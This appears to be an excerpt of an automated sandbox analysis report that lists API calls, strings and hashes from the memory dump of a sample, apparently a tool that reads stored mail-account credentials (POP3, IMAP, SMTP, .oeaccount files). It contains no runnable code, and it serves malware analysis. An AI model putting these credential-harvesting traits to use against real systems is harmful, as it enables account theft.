                                                                                                                                                                                    • API String ID: 1999381814-0
                                                                                                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                    • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,761F0A60,00000000,?,?,0040A7BE,00000001,0044CBC0,761F0A60), ref: 00406D4D
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                                                                                                    • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,7639E430,?), ref: 004081B9
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                    • API String ID: 524865279-2190619648
                                                                                                                                                                                    • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                                                                                                    • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                                                    • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                    APIs
• UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
• UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
• memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
• CoTaskMemFree.COMBASE(?), ref: 004108D2
Strings
• 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
• 00000000-0000-0000-0000-000000000000, xrefs: 00410882
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FromStringUuid$FreeTaskmemcpy
• String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
• API String ID: 1640410171-3316789007
• Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
• Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
• Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
• Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _mbscat$memsetsprintf
• String ID: %2.2X
• API String ID: 125969286-791839006
• Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
• Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
• Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
• Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
APIs
  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
• ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
• SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
• CloseHandle.KERNEL32(?), ref: 00444206
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID: ACD
• API String ID: 1886237854-620537770
• Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
• Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
• Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
• Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
APIs
• memset.MSVCRT ref: 004091EC
• sprintf.MSVCRT ref: 00409201
  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
• SetWindowTextA.USER32(?,?), ref: 00409228
• EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
• String ID: caption$dialog_%d
• API String ID: 2923679083-4161923789
• Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
• Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
• Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
• Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
APIs
• memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
Strings
• unknown error, xrefs: 004277B2
• no such savepoint: %s, xrefs: 00426A02
• cannot open savepoint - SQL statements in progress, xrefs: 00426934
• cannot release savepoint - SQL statements in progress, xrefs: 00426A20
• abort due to ROLLBACK, xrefs: 00428781
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy
• String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
• API String ID: 3510742995-3035234601
• Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
• Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
• Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
• Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset
• String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-3608744896
• Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
• Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
• Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
• Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
• memset.MSVCRT ref: 00410246
• memset.MSVCRT ref: 00410258
  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
• memset.MSVCRT ref: 0041033F
• _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
• CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$_mbscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3974772901-0
• Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
• Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
• Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
• Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
APIs
• wcslen.MSVCRT ref: 0044406C
• ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
• WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
• strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                                                    • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                                                    • API String ID: 2025310588-821077329
                                                                                                                                                                                    • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,761F0A60), ref: 00408EBE
                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
